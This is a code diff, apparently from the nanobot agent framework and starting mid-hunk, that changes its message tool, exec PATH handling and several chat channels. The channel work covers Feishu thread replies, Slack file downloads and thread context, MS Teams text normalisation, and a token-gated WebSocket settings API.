available_wrapped_names = [_sanitize_name(f"mcp_{name}_{tool_def.name}") for tool_def in tools.tools]
for tool_def in tools.tools:
wrapped_name = f"mcp_{name}_{tool_def.name}"
wrapped_name = _sanitize_name(f"mcp_{name}_{tool_def.name}")
if (
not allow_all_tools
and tool_def.name not in enabled_tools

View File

@ -1,11 +1,14 @@
"""Message tool for sending messages to users."""
import os
from contextvars import ContextVar
from pathlib import Path
from typing import Any, Awaitable, Callable
from nanobot.agent.tools.base import Tool, tool_parameters
from nanobot.agent.tools.schema import ArraySchema, StringSchema, tool_parameters_schema
from nanobot.bus.events import OutboundMessage
from nanobot.config.paths import get_workspace_path
@tool_parameters(
@ -33,21 +36,38 @@ class MessageTool(Tool):
default_channel: str = "",
default_chat_id: str = "",
default_message_id: str | None = None,
workspace: str | Path | None = None,
):
self._send_callback = send_callback
self._workspace = Path(workspace).expanduser() if workspace is not None else get_workspace_path()
self._default_channel: ContextVar[str] = ContextVar("message_default_channel", default=default_channel)
self._default_chat_id: ContextVar[str] = ContextVar("message_default_chat_id", default=default_chat_id)
self._default_message_id: ContextVar[str | None] = ContextVar(
"message_default_message_id",
default=default_message_id,
)
self._default_metadata: ContextVar[dict[str, Any]] = ContextVar(
"message_default_metadata",
default={},
)
self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False)
self._record_channel_delivery_var: ContextVar[bool] = ContextVar(
"message_record_channel_delivery",
default=False,
)
def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
def set_context(
self,
channel: str,
chat_id: str,
message_id: str | None = None,
metadata: dict[str, Any] | None = None,
) -> None:
"""Set the current message context."""
self._default_channel.set(channel)
self._default_chat_id.set(chat_id)
self._default_message_id.set(message_id)
self._default_metadata.set(metadata or {})
def set_send_callback(self, callback: Callable[[OutboundMessage], Awaitable[None]]) -> None:
"""Set the callback for sending messages."""
@ -57,6 +77,14 @@ class MessageTool(Tool):
"""Reset per-turn send tracking."""
self._sent_in_turn = False
def set_record_channel_delivery(self, active: bool):
"""Mark tool-sent messages as proactive channel deliveries."""
return self._record_channel_delivery_var.set(active)
def reset_record_channel_delivery(self, token) -> None:
"""Restore previous proactive delivery recording state."""
self._record_channel_delivery_var.reset(token)
@property
def _sent_in_turn(self) -> bool:
return self._sent_in_turn_var.get()
@ -106,7 +134,8 @@ class MessageTool(Tool):
# some channels (e.g. Feishu) use it to determine the target
# conversation via their Reply API, which would route the message
# to the wrong chat entirely.
if channel == default_channel and chat_id == default_chat_id:
same_target = channel == default_channel and chat_id == default_chat_id
if same_target:
message_id = message_id or self._default_message_id.get()
else:
message_id = None
@ -117,15 +146,28 @@ class MessageTool(Tool):
if not self._send_callback:
return "Error: Message sending not configured"
if media:
resolved = []
for p in media:
if p.startswith(("http://", "https://")) or os.path.isabs(p):
resolved.append(p)
else:
resolved.append(str(self._workspace / p))
media = resolved
metadata = dict(self._default_metadata.get()) if same_target else {}
if message_id:
metadata["message_id"] = message_id
if self._record_channel_delivery_var.get():
metadata["_record_channel_delivery"] = True
msg = OutboundMessage(
channel=channel,
chat_id=chat_id,
content=content,
media=media or [],
buttons=buttons or [],
metadata={
"message_id": message_id,
} if message_id else {},
metadata=metadata,
)
try:

View File

@ -136,9 +136,10 @@ class ExecTool(Tool):
if self.path_append:
if _IS_WINDOWS:
env["PATH"] = env.get("PATH", "") + ";" + self.path_append
env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
else:
command = f'export PATH="$PATH:{self.path_append}"; {command}'
env["NANOBOT_PATH_APPEND"] = self.path_append
command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}'
try:
process = await self._spawn(command, cwd, env)
@ -298,8 +299,8 @@ class ExecTool(Tool):
continue
media_path = get_media_dir().resolve()
if (p.is_absolute()
and cwd_path not in p.parents
if (p.is_absolute()
and cwd_path not in p.parents
and p != cwd_path
and media_path not in p.parents
and p != media_path

View File

@ -13,6 +13,7 @@ from dataclasses import dataclass
from typing import Any, Literal
from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
from loguru import logger
from pydantic import Field
@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel
from nanobot.config.paths import get_media_dir
from nanobot.config.schema import Base
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None
# Message type display mapping
@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel):
self._loop: asyncio.AbstractEventLoop | None = None
self._stream_bufs: dict[str, _FeishuStreamBuf] = {}
self._bot_open_id: str | None = None
self._background_tasks: set[asyncio.Task] = set()
self._reaction_ids: dict[str, str] = {} # message_id → reaction_id
@staticmethod
def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any:
@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel):
return None
async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None:
"""
Add a reaction emoji to a message (non-blocking).
"""Add a reaction emoji to a message.
Returns the reaction_id on success, None on failure.
When called via a tracked background task, the returned reaction_id
is stored in ``_reaction_ids`` for later cleanup by ``send_delta``.
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART
"""
@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel):
loop = asyncio.get_running_loop()
await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id)
def _on_background_task_done(self, task: asyncio.Task) -> None:
"""Callback: remove from tracking set and log unhandled exceptions."""
self._background_tasks.discard(task)
if task.cancelled():
return
try:
task.result()
except Exception as exc:
logger.warning("Background task failed: {}", exc)
def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None:
"""Callback: store reaction_id after background add-reaction completes."""
if task.cancelled():
return
try:
reaction_id = task.result()
if reaction_id:
self._reaction_ids[message_id] = reaction_id
except Exception:
pass # already logged by _on_background_task_done
# Trim cache to prevent unbounded growth
if len(self._reaction_ids) > 500:
self._reaction_ids.pop(next(iter(self._reaction_ids)))
@staticmethod
def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str:
"""Scope streaming buffers to the inbound message when available."""
meta = metadata or {}
return meta.get("message_id") or chat_id
# Regex to match markdown tables (header + separator + data rows)
_TABLE_RE = re.compile(
r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)",
@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel):
logger.debug("Feishu: error fetching parent message {}: {}", message_id, e)
return None
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool:
"""Reply to an existing Feishu message using the Reply API (synchronous)."""
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool:
"""Reply to an existing Feishu message using the Reply API (synchronous).
Args:
reply_in_thread: If True, reply as a thread/topic message
in the Feishu client.
"""
from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody
try:
body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content)
if reply_in_thread:
body_builder = body_builder.reply_in_thread(True)
request = (
ReplyMessageRequest.builder()
.message_id(parent_message_id)
.request_body(
ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build()
)
.request_body(body_builder.build())
.build()
)
response = self._client.im.v1.message.reply(request)
@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel):
logger.error("Error sending Feishu {} message: {}", msg_type, e)
return None
def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None:
"""Create a CardKit streaming card, send it to chat, return card_id."""
def _create_streaming_card_sync(
self,
receive_id_type: str,
chat_id: str,
reply_message_id: str | None = None,
) -> str | None:
"""Create a CardKit streaming card, send it to chat, return card_id.
When *reply_message_id* is provided the card is delivered via the
reply API (with reply_in_thread=True) so it lands inside the
originating thread / topic. Otherwise the plain create-message
API is used.
"""
from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody
card_json = {
@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel):
return None
card_id = getattr(response.data, "card_id", None)
if card_id:
message_id = self._send_message_sync(
receive_id_type,
chat_id,
"interactive",
json.dumps({"type": "card", "data": {"card_id": card_id}}),
card_content = json.dumps(
{"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False
)
if message_id:
if reply_message_id:
sent = self._reply_message_sync(
reply_message_id, "interactive", card_content,
reply_in_thread=True,
)
else:
sent = self._send_message_sync(
receive_id_type, chat_id, "interactive", card_content,
) is not None
if sent:
return card_id
logger.warning(
"Created streaming card {} but failed to send it to {}", card_id, chat_id
@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel):
_stream_end: Finalize the streaming card.
_tool_hint: Delta is a formatted tool hint (for display only).
message_id: Original message id (used with _stream_end for reaction cleanup).
reaction_id: Reaction id to remove on stream end.
chat_type: "group" or "p2p" controls reply-in-thread for streaming cards.
"""
if not self._client:
return
meta = metadata or {}
stream_key = self._stream_key(chat_id, meta)
loop = asyncio.get_running_loop()
rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id"
# --- stream end: final update or fallback ---
if meta.get("_stream_end"):
if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")):
await self._remove_reaction(message_id, reaction_id)
message_id = meta.get("message_id")
if message_id:
reaction_id = self._reaction_ids.pop(message_id, None)
if reaction_id:
await self._remove_reaction(message_id, reaction_id)
# Add completion emoji if configured
if self.config.done_emoji and message_id:
if self.config.done_emoji:
await self._add_reaction(message_id, self.config.done_emoji)
buf = self._stream_bufs.pop(chat_id, None)
buf = self._stream_bufs.pop(stream_key, None)
if not buf or not buf.text:
return
# Try to finalize via streaming card; if that fails (e.g.
@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel):
{"config": {"wide_screen_mode": True}, "elements": chunk},
ensure_ascii=False,
)
await loop.run_in_executor(
None, self._send_message_sync, rid_type, chat_id, "interactive", card
)
# Fallback: reply via the Reply API for group chats.
# Target message_id — the Feishu API keeps the reply in
# the same topic automatically.
_f_msg = meta.get("message_id")
fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None
if fallback_msg_id:
await loop.run_in_executor(
None, lambda: self._reply_message_sync(
fallback_msg_id, "interactive", card,
reply_in_thread=True,
),
)
else:
await loop.run_in_executor(
None, self._send_message_sync, rid_type, chat_id, "interactive", card
)
return
# --- accumulate delta ---
buf = self._stream_bufs.get(chat_id)
buf = self._stream_bufs.get(stream_key)
if buf is None:
buf = _FeishuStreamBuf()
self._stream_bufs[chat_id] = buf
self._stream_bufs[stream_key] = buf
buf.text += delta
if not buf.text.strip():
return
now = time.monotonic()
if buf.card_id is None:
# Send the streaming card as a reply for group chats so it
# lands inside the originating topic/thread. Always target
# message_id (the actual inbound message) — the Feishu Reply
# API keeps the response in the same topic automatically.
is_group = meta.get("chat_type", "group") == "group"
reply_msg_id = meta.get("message_id") if is_group else None
card_id = await loop.run_in_executor(
None, self._create_streaming_card_sync, rid_type, chat_id
None,
self._create_streaming_card_sync,
rid_type, chat_id, reply_msg_id,
)
if card_id:
buf.card_id = card_id
@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel):
hint = (msg.content or "").strip()
if not hint:
return
buf = self._stream_bufs.get(msg.chat_id)
buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata))
if buf and buf.card_id:
# Delegate to send_delta so tool hints get the same
# throttling (and card creation) as regular text deltas.
@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel):
return
# No active streaming card — send as a regular
# interactive card with the same 🔧 prefix style.
# Use reply API for group chats so the hint stays in topic.
card = json.dumps(
{"config": {"wide_screen_mode": True}, "elements": [
{"tag": "markdown", "content": self._format_tool_hint_delta(hint)},
]},
ensure_ascii=False,
)
await loop.run_in_executor(
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
)
_th_msg_id = msg.metadata.get("message_id")
_th_chat_type = msg.metadata.get("chat_type", "group")
if _th_msg_id and _th_chat_type == "group":
await loop.run_in_executor(
None, lambda: self._reply_message_sync(
_th_msg_id, "interactive", card,
reply_in_thread=True,
),
)
else:
await loop.run_in_executor(
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
)
return
# Determine whether the first message should quote the user's message.
# Only the very first send (media or text) in this call uses reply; subsequent
# chunks/media fall back to plain create to avoid redundant quote bubbles.
# Always target message_id — the Feishu Reply API keeps replies in the
# same topic automatically when the target message is inside a topic.
reply_message_id: str | None = None
_msg_id = msg.metadata.get("message_id")
if self.config.reply_to_message and not msg.metadata.get("_progress", False):
reply_message_id = msg.metadata.get("message_id") or None
reply_message_id = _msg_id
# For topic group messages, always reply to keep context in thread
elif msg.metadata.get("thread_id"):
reply_message_id = (
msg.metadata.get("root_id") or msg.metadata.get("message_id") or None
)
reply_message_id = _msg_id
first_send = True # tracks whether the reply has already been used
def _do_send(m_type: str, content: str) -> None:
"""Send via reply (first message) or create (subsequent)."""
"""Send via reply (first message) or create (subsequent).
For group chats the reply API always uses reply_in_thread=True.
The Feishu API automatically keeps replies inside existing
topics reply_in_thread only creates a *new* topic when the
target message is a plain (non-topic) message.
"""
nonlocal first_send
if reply_message_id and first_send:
first_send = False
ok = self._reply_message_sync(reply_message_id, m_type, content)
chat_type = msg.metadata.get("chat_type", "group")
ok = self._reply_message_sync(
reply_message_id, m_type, content,
reply_in_thread=chat_type == "group",
)
if ok:
return
# Fall back to regular send if reply fails
@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel):
logger.debug("Feishu: skipping group message (not mentioned)")
return
# Add reaction
reaction_id = await self._add_reaction(message_id, self.config.react_emoji)
# Add reaction (non-blocking — tracked background task)
task = asyncio.create_task(
self._add_reaction(message_id, self.config.react_emoji)
)
self._background_tasks.add(task)
task.add_done_callback(self._on_background_task_done)
task.add_done_callback(lambda t: self._on_reaction_added(message_id, t))
# Parse content
content_parts = []
@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel):
if not content and not media_paths:
return
# Build topic-scoped session key for conversation isolation.
# Group chat: each topic gets its own session via root_id (replies
# inside a topic) or message_id (top-level messages start a new topic).
# Private chat: no override — same behavior as Telegram/Slack.
if chat_type == "group":
session_key = f"feishu:{chat_id}:{root_id or message_id}"
else:
session_key = None
# Forward to message bus
reply_to = chat_id if chat_type == "group" else sender_id
await self._handle_message(
@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel):
media=media_paths,
metadata={
"message_id": message_id,
"reaction_id": reaction_id,
"chat_type": chat_type,
"msg_type": msg_type,
"parent_id": parent_id,
"root_id": root_id,
"thread_id": thread_id,
},
session_key=session_key,
)
except Exception as e:

View File

@ -172,6 +172,7 @@ class ChannelManager:
channel=notice.channel,
chat_id=notice.chat_id,
content=format_restart_completed_message(notice.started_at_raw),
metadata=dict(notice.metadata or {}),
),
))

View File

@ -247,7 +247,6 @@ class MSTeamsChannel(BaseChannel):
token = await self._get_access_token()
base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities"
use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id)
url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
@ -260,7 +259,7 @@ class MSTeamsChannel(BaseChannel):
payload["replyToId"] = ref.activity_id
try:
resp = await self._http.post(url, headers=headers, json=payload)
resp = await self._http.post(base_url, headers=headers, json=payload)
resp.raise_for_status()
logger.info("MSTeams message sent to {}", ref.conversation_id)
self._touch_conversation_ref(str(msg.chat_id), persist=True)
@ -340,10 +339,12 @@ class MSTeamsChannel(BaseChannel):
"""Extract the user-authored text from a Teams activity."""
text = str(activity.get("text") or "")
text = self._strip_possible_bot_mention(text)
text = self._normalize_html_whitespace(text)
channel_data = activity.get("channelData") or {}
reply_to_id = str(activity.get("replyToId") or "").strip()
normalized_preview = html.unescape(text).replace("&rsquo", "").strip()
normalized_preview = normalized_preview.replace("\xa0", " ")
normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n")
preview_lines = [line.strip() for line in normalized_preview.split("\n")]
while preview_lines and not preview_lines[0]:
@ -363,9 +364,15 @@ class MSTeamsChannel(BaseChannel):
cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned)
return cleaned.strip()
def _normalize_html_whitespace(self, text: str) -> str:
"""Normalize common HTML whitespace/entities from Teams into plain text spacing."""
normalized = html.unescape(text).replace("&rsquo", "")
normalized = normalized.replace("\xa0", " ")
return normalized
def _normalize_teams_reply_quote(self, text: str) -> str:
"""Normalize Teams quoted replies into a compact structured form."""
cleaned = html.unescape(text).replace("&rsquo", "").strip()
cleaned = self._normalize_html_whitespace(text).strip()
if not cleaned:
return ""

View File

@ -2,8 +2,10 @@
import asyncio
import re
from pathlib import Path
from typing import Any
import httpx
from loguru import logger
from pydantic import Field
from slack_sdk.socket_mode.request import SocketModeRequest
@ -15,7 +17,9 @@ from slackify_markdown import slackify_markdown
from nanobot.bus.events import OutboundMessage
from nanobot.bus.queue import MessageBus
from nanobot.channels.base import BaseChannel
from nanobot.config.paths import get_media_dir
from nanobot.config.schema import Base
from nanobot.utils.helpers import safe_filename, split_message
class SlackDMConfig(Base):
@ -38,12 +42,19 @@ class SlackConfig(Base):
reply_in_thread: bool = True
react_emoji: str = "eyes"
done_emoji: str = "white_check_mark"
include_thread_context: bool = True
thread_context_limit: int = 20
allow_from: list[str] = Field(default_factory=list)
group_policy: str = "mention"
group_allow_from: list[str] = Field(default_factory=list)
dm: SlackDMConfig = Field(default_factory=SlackDMConfig)
SLACK_MAX_MESSAGE_LEN = 39_000 # Slack API allows ~40k; leave margin
SLACK_DOWNLOAD_TIMEOUT = 30.0
_HTML_DOWNLOAD_PREFIXES = (b"<!doctype html", b"<html")
class SlackChannel(BaseChannel):
"""Slack channel using Socket Mode."""
@ -57,6 +68,8 @@ class SlackChannel(BaseChannel):
def default_config(cls) -> dict[str, Any]:
return SlackConfig().model_dump(by_alias=True)
_THREAD_CONTEXT_CACHE_LIMIT = 10_000
def __init__(self, config: Any, bus: MessageBus):
if isinstance(config, dict):
config = SlackConfig.model_validate(config)
@ -66,6 +79,7 @@ class SlackChannel(BaseChannel):
self._socket_client: SocketModeClient | None = None
self._bot_user_id: str | None = None
self._target_cache: dict[str, str] = {}
self._thread_context_attempted: set[str] = set()
async def start(self) -> None:
"""Start the Slack Socket Mode client."""
@ -128,14 +142,17 @@ class SlackChannel(BaseChannel):
else None
)
# Slack rejects empty text payloads. Keep media-only messages media-only,
# but send a single blank message when the bot has no text or files to send.
if msg.content or not (msg.media or []):
await self._web_client.chat_postMessage(
channel=target_chat_id,
text=self._to_mrkdwn(msg.content) if msg.content else " ",
thread_ts=thread_ts_param,
)
mrkdwn = self._to_mrkdwn(msg.content) if msg.content else " "
buttons = getattr(msg, "buttons", None) or []
chunks = split_message(mrkdwn, SLACK_MAX_MESSAGE_LEN)
for index, chunk in enumerate(chunks):
kwargs: dict[str, Any] = dict(
channel=target_chat_id, text=chunk, thread_ts=thread_ts_param,
)
if buttons and index == len(chunks) - 1:
kwargs["blocks"] = self._build_button_blocks(chunk, buttons)
await self._web_client.chat_postMessage(**kwargs)
for media_path in msg.media or []:
try:
@ -273,6 +290,9 @@ class SlackChannel(BaseChannel):
req: SocketModeRequest,
) -> None:
"""Handle incoming Socket Mode requests."""
if req.type == "interactive":
await self._on_block_action(client, req)
return
if req.type != "events_api":
return
@ -292,8 +312,10 @@ class SlackChannel(BaseChannel):
sender_id = event.get("user")
chat_id = event.get("channel")
# Ignore bot/system messages (any subtype = not a normal user message)
if event.get("subtype"):
subtype = event.get("subtype")
# Slack uses subtype=file_share for user messages with attachments.
# Ignore other subtypes such as bot_message / message_changed / deleted.
if subtype and subtype != "file_share":
return
if self._bot_user_id and sender_id == self._bot_user_id:
return
@ -308,7 +330,7 @@ class SlackChannel(BaseChannel):
logger.debug(
"Slack event: type={} subtype={} user={} channel={} channel_type={} text={}",
event_type,
event.get("subtype"),
subtype,
sender_id,
chat_id,
event.get("channel_type"),
@ -327,9 +349,11 @@ class SlackChannel(BaseChannel):
text = self._strip_bot_mention(text)
thread_ts = event.get("thread_ts")
event_ts = event.get("ts")
raw_thread_ts = event.get("thread_ts")
thread_ts = raw_thread_ts
if self.config.reply_in_thread and not thread_ts:
thread_ts = event.get("ts")
thread_ts = event_ts
# Add :eyes: reaction to the triggering message (best-effort)
try:
if self._web_client and event.get("ts"):
@ -343,12 +367,37 @@ class SlackChannel(BaseChannel):
# Thread-scoped session key for channel/group messages
session_key = f"slack:{chat_id}:{thread_ts}" if thread_ts and channel_type != "im" else None
media_paths: list[str] = []
file_markers: list[str] = []
for file_info in event.get("files") or []:
if not isinstance(file_info, dict):
continue
file_path, marker = await self._download_slack_file(file_info)
if file_path:
media_paths.append(file_path)
if marker:
file_markers.append(marker)
is_slash = text.strip().startswith("/")
content = text if is_slash else await self._with_thread_context(
text,
chat_id=chat_id,
channel_type=channel_type,
thread_ts=thread_ts,
raw_thread_ts=raw_thread_ts,
current_ts=event_ts,
)
if file_markers:
content = "\n".join(part for part in [content, *file_markers] if part)
if not content and not media_paths:
return
try:
await self._handle_message(
sender_id=sender_id,
chat_id=chat_id,
content=text,
content=content,
media=media_paths,
metadata={
"slack": {
"event": event,
@ -361,6 +410,163 @@ class SlackChannel(BaseChannel):
except Exception:
logger.exception("Error handling Slack message from {}", sender_id)
async def _download_slack_file(self, file_info: dict[str, Any]) -> tuple[str | None, str]:
"""Download a Slack private file to the local media directory."""
file_id = str(file_info.get("id") or "file")
name = str(
file_info.get("name")
or file_info.get("title")
or file_info.get("id")
or "slack-file"
)
marker_type = "image" if str(file_info.get("mimetype") or "").startswith("image/") else "file"
marker = f"[{marker_type}: {name}]"
url = str(file_info.get("url_private_download") or file_info.get("url_private") or "")
if not url:
return None, f"[{marker_type}: {name}: missing download url]"
if not self.config.bot_token:
return None, f"[{marker_type}: {name}: missing bot token]"
filename = safe_filename(f"{file_id}_{name}")
path = Path(get_media_dir("slack")) / filename
try:
async with httpx.AsyncClient(timeout=SLACK_DOWNLOAD_TIMEOUT, follow_redirects=True) as client:
response = await client.get(
url,
headers={"Authorization": f"Bearer {self.config.bot_token}"},
)
response.raise_for_status()
if self._looks_like_html_download(response):
raise ValueError("Slack returned HTML instead of file content")
path.write_bytes(response.content)
return str(path), marker
except Exception as e:
logger.warning("Failed to download Slack file {}: {}", file_id, e)
return None, f"[{marker_type}: {name}: download failed]"
@staticmethod
def _looks_like_html_download(response: httpx.Response) -> bool:
content_type = response.headers.get("content-type", "").lower()
if "text/html" in content_type:
return True
preview = response.content[:256].lstrip().lower()
return preview.startswith(_HTML_DOWNLOAD_PREFIXES)
async def _on_block_action(self, client: SocketModeClient, req: SocketModeRequest) -> None:
"""Handle button clicks from ask_user blocks."""
await client.send_socket_mode_response(SocketModeResponse(envelope_id=req.envelope_id))
payload = req.payload or {}
actions = payload.get("actions") or []
if not actions:
return
value = str(actions[0].get("value") or "")
user_info = payload.get("user") or {}
sender_id = str(user_info.get("id") or "")
channel_info = payload.get("channel") or {}
chat_id = str(channel_info.get("id") or "")
if not sender_id or not chat_id or not value:
return
message_info = payload.get("message") or {}
thread_ts = message_info.get("thread_ts") or message_info.get("ts")
channel_type = self._infer_channel_type(chat_id)
if not self._is_allowed(sender_id, chat_id, channel_type):
return
session_key = f"slack:{chat_id}:{thread_ts}" if thread_ts else None
try:
await self._handle_message(
sender_id=sender_id,
chat_id=chat_id,
content=value,
metadata={"slack": {"thread_ts": thread_ts, "channel_type": channel_type}},
session_key=session_key,
)
except Exception:
logger.exception("Error handling Slack button click from {}", sender_id)
async def _with_thread_context(
self,
text: str,
*,
chat_id: str,
channel_type: str,
thread_ts: str | None,
raw_thread_ts: str | None,
current_ts: str | None,
) -> str:
"""Include thread history the first time the bot is pulled into a Slack thread."""
if (
not self.config.include_thread_context
or not self._web_client
or channel_type == "im"
or not raw_thread_ts
or not thread_ts
or current_ts == thread_ts
):
return text
key = f"{chat_id}:{thread_ts}"
if key in self._thread_context_attempted:
return text
if len(self._thread_context_attempted) >= self._THREAD_CONTEXT_CACHE_LIMIT:
self._thread_context_attempted.clear()
self._thread_context_attempted.add(key)
try:
response = await self._web_client.conversations_replies(
channel=chat_id,
ts=thread_ts,
limit=max(1, self.config.thread_context_limit),
)
except Exception as e:
logger.warning("Slack thread context unavailable for {}: {}", key, e)
return text
lines = self._format_thread_context(
response.get("messages", []),
current_ts=current_ts,
)
if not lines:
return text
return "Slack thread context before this mention:\n" + "\n".join(lines) + f"\n\nCurrent message:\n{text}"
def _format_thread_context(self, messages: list[dict[str, Any]], *, current_ts: str | None) -> list[str]:
lines: list[str] = []
for item in messages:
if item.get("ts") == current_ts:
continue
if item.get("subtype"):
continue
sender = str(item.get("user") or item.get("bot_id") or "unknown")
is_bot = self._bot_user_id is not None and sender == self._bot_user_id
label = "bot" if is_bot else f"<@{sender}>"
text = str(item.get("text") or "").strip()
if not text:
continue
text = self._strip_bot_mention(text)
if len(text) > 500:
text = text[:500] + ""
lines.append(f"- {label}: {text}")
return lines
@staticmethod
def _build_button_blocks(text: str, buttons: list[list[str]]) -> list[dict[str, Any]]:
"""Build Slack Block Kit blocks with action buttons for ask_user choices."""
blocks: list[dict[str, Any]] = [
{"type": "section", "text": {"type": "mrkdwn", "text": text[:3000]}},
]
elements = []
for row in buttons:
for label in row:
elements.append({
"type": "button",
"text": {"type": "plain_text", "text": label[:75]},
"value": label[:75],
"action_id": f"ask_user_{label[:50]}",
})
if elements:
blocks.append({"type": "actions", "elements": elements[:25]})
return blocks
async def _update_react_emoji(self, chat_id: str, ts: str | None) -> None:
"""Remove the in-progress reaction and optionally add a done reaction."""
if not self._web_client or not ts:
@ -407,6 +613,19 @@ class SlackChannel(BaseChannel):
return chat_id in self.config.group_allow_from
return False
def is_allowed(self, sender_id: str) -> bool:
# Slack needs channel-aware policy checks, so _on_socket_request and
# _on_block_action call _is_allowed before handing off to BaseChannel.
return True
@staticmethod
def _infer_channel_type(chat_id: str) -> str:
if chat_id.startswith("D"):
return "im"
if chat_id.startswith("G"):
return "group"
return "channel"
def _strip_bot_mention(self, text: str) -> str:
if not text or not self._bot_user_id:
return text

View File

@ -54,6 +54,14 @@ def _normalize_config_path(path: str) -> str:
return _strip_trailing_slash(path)
def _append_buttons_as_text(text: str, buttons: list[list[str]]) -> str:
labels = [label for row in buttons for label in row if label]
if not labels:
return text
fallback = "\n".join(f"{index}. {label}" for index, label in enumerate(labels, 1))
return f"{text}\n\n{fallback}" if text else fallback
class WebSocketConfig(Base):
"""WebSocket server channel configuration.
@ -531,6 +539,12 @@ class WebSocketChannel(BaseChannel):
if got == "/api/sessions":
return self._handle_sessions_list(request)
if got == "/api/settings":
return self._handle_settings(request)
if got == "/api/settings/update":
return self._handle_settings_update(request)
m = re.match(r"^/api/sessions/([^/]+)/messages$", got)
if m:
return self._handle_session_messages(request, m.group(1))
@ -639,6 +653,75 @@ class WebSocketChannel(BaseChannel):
]
return _http_json_response({"sessions": cleaned})
def _settings_payload(self, *, requires_restart: bool = False) -> dict[str, Any]:
from nanobot.config.loader import get_config_path, load_config
from nanobot.providers.registry import PROVIDERS, find_by_name
config = load_config()
defaults = config.agents.defaults
provider_name = config.get_provider_name(defaults.model) or defaults.provider
provider = config.get_provider(defaults.model)
selected_provider = provider_name
if defaults.provider != "auto":
spec = find_by_name(defaults.provider)
selected_provider = spec.name if spec else provider_name
return {
"agent": {
"model": defaults.model,
"provider": selected_provider,
"resolved_provider": provider_name,
"has_api_key": bool(provider and provider.api_key),
},
"providers": [
{"name": "auto", "label": "Auto"}
] + [
{"name": spec.name, "label": spec.label}
for spec in PROVIDERS
],
"runtime": {
"config_path": str(get_config_path().expanduser()),
},
"requires_restart": requires_restart,
}
def _handle_settings(self, request: WsRequest) -> Response:
if not self._check_api_token(request):
return _http_error(401, "Unauthorized")
return _http_json_response(self._settings_payload())
def _handle_settings_update(self, request: WsRequest) -> Response:
if not self._check_api_token(request):
return _http_error(401, "Unauthorized")
from nanobot.config.loader import load_config, save_config
from nanobot.providers.registry import find_by_name
query = _parse_query(request.path)
config = load_config()
defaults = config.agents.defaults
changed = False
model = _query_first(query, "model")
if model is not None:
model = model.strip()
if not model:
return _http_error(400, "model is required")
if defaults.model != model:
defaults.model = model
changed = True
provider = _query_first(query, "provider")
if provider is not None:
provider = provider.strip() or "auto"
if provider != "auto" and find_by_name(provider) is None:
return _http_error(400, "unknown provider")
if defaults.provider != provider:
defaults.provider = provider
changed = True
if changed:
save_config(config)
return _http_json_response(self._settings_payload(requires_restart=changed))
@staticmethod
def _is_webui_session_key(key: str) -> bool:
"""Return True when *key* belongs to the webui's websocket-only surface."""
@ -1146,11 +1229,17 @@ class WebSocketChannel(BaseChannel):
if not conns:
logger.warning("websocket: no active subscribers for chat_id={}", msg.chat_id)
return
text = msg.content
if msg.buttons:
text = _append_buttons_as_text(text, msg.buttons)
payload: dict[str, Any] = {
"event": "message",
"chat_id": msg.chat_id,
"text": msg.content,
"text": text,
}
if msg.buttons:
payload["buttons"] = msg.buttons
payload["button_prompt"] = msg.content
if msg.media:
payload["media"] = msg.media
urls: list[dict[str, str]] = []

View File

@ -212,12 +212,16 @@ async def _print_interactive_response(
def _print_cli_progress_line(text: str, thinking: ThinkingSpinner | None) -> None:
"""Print a CLI progress line, pausing the spinner if needed."""
if not text.strip():
return
with thinking.pause() if thinking else nullcontext():
console.print(f" [dim]↳ {text}[/dim]")
